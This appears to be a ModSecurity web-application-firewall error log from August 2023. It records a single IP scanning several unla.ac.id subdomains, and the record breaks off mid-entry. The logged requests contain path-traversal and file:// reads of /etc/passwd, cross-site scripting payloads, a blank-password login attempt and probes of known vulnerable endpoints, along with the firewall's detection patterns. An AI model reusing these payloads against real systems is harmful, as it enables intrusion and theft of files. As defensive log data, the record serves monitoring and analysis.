[Tue Aug 29 11:48:12.532229 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAkoTgEAAAAH"]
[Tue Aug 29 11:48:12.553527 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAfWN4cAAAAL"]
[Tue Aug 29 11:48:12.636122 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAkoTgYAAAAH"]
[Tue Aug 29 11:48:12.636180 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jMCo-f0AAAkoTgYAAAAH"]
[Tue Aug 29 11:48:12.657486 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAkoTgcAAAAH"]
[Tue Aug 29 11:48:12.711551 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAfWN44AAAAL"]
[Tue Aug 29 11:48:12.757197 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAkoTgwAAAAH"]
[Tue Aug 29 11:48:13.365376 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "ft.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAhujBMAAAAr"]
[Tue Aug 29 11:48:13.365473 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAhujBMAAAAr"]
[Tue Aug 29 11:48:13.379062 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "www.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkoThQAAAAH"]
[Tue Aug 29 11:48:13.379121 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkoThQAAAAH"]
[Tue Aug 29 11:48:13.383579 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "informatika.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkksJ8AAAAA"]
[Tue Aug 29 11:48:13.383617 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkksJ8AAAAA"]
[Tue Aug 29 11:48:13.403601 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "journal.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAhujBUAAAAr"]
[Tue Aug 29 11:48:13.403643 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAhujBUAAAAr"]
[Tue Aug 29 11:48:13.443985 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "pusatbahasa.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkoThcAAAAH"]
[Tue Aug 29 11:48:13.444026 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkoThcAAAAH"]
[Tue Aug 29 11:48:13.465492 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14jcCo-f0AAAhujBgAAAAr"]
[Tue Aug 29 11:48:13.486982 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jcCo-f0AAAhujBkAAAAr"]
[Tue Aug 29 11:48:14.418422 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jsCo-f0AAAkaDCkAAAAJ"]
[Tue Aug 29 11:48:17.746596 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAdxU0oAAAAC"]
[Tue Aug 29 11:48:17.792338 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAjbw@kAAAAW"]
[Tue Aug 29 11:48:17.807322 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAdxU00AAAAC"]
[Tue Aug 29 11:48:17.812458 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAjbw@oAAAAW"]
[Tue Aug 29 11:48:18.350771 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14ksCo-f0AAAkAME0AAAAU"]
[Tue Aug 29 11:48:18.352962 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAkoTiQAAAAH"]
[Tue Aug 29 11:48:18.374874 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14ksCo-f0AAAkdu90AAAAO"]
[Tue Aug 29 11:48:18.412261 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAkoTicAAAAH"]
[Tue Aug 29 11:48:18.461339 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAkAMFIAAAAU"]
[Tue Aug 29 11:48:18.480035 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAfWN74AAAAL"]
[Tue Aug 29 11:48:18.503682 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAj12DwAAAAa"]
[Tue Aug 29 11:48:19.502501 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14k8Co-f0AAAknEGMAAAAB"]
[Tue Aug 29 11:48:21.381489 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAjYrD4AAAAK"]
[Tue Aug 29 11:48:21.386882 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAjM7KwAAAAT"]
[Tue Aug 29 11:48:21.498164 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAkrz6gAAAAC"]
[Tue Aug 29 11:48:21.518698 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAkrz6kAAAAC"]
[Tue Aug 29 11:48:21.536784 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjM7LMAAAAT"]
[Tue Aug 29 11:48:21.539882 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjYrEQAAAAK"]
[Tue Aug 29 11:48:21.557522 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAkrz6sAAAAC"]
[Tue Aug 29 11:48:21.561229 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjYrEUAAAAK"]
[Tue Aug 29 11:48:21.605370 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjM7LYAAAAT"]
[Tue Aug 29 11:48:21.623837 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAkrz64AAAAC"]
[Tue Aug 29 11:48:21.644416 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id 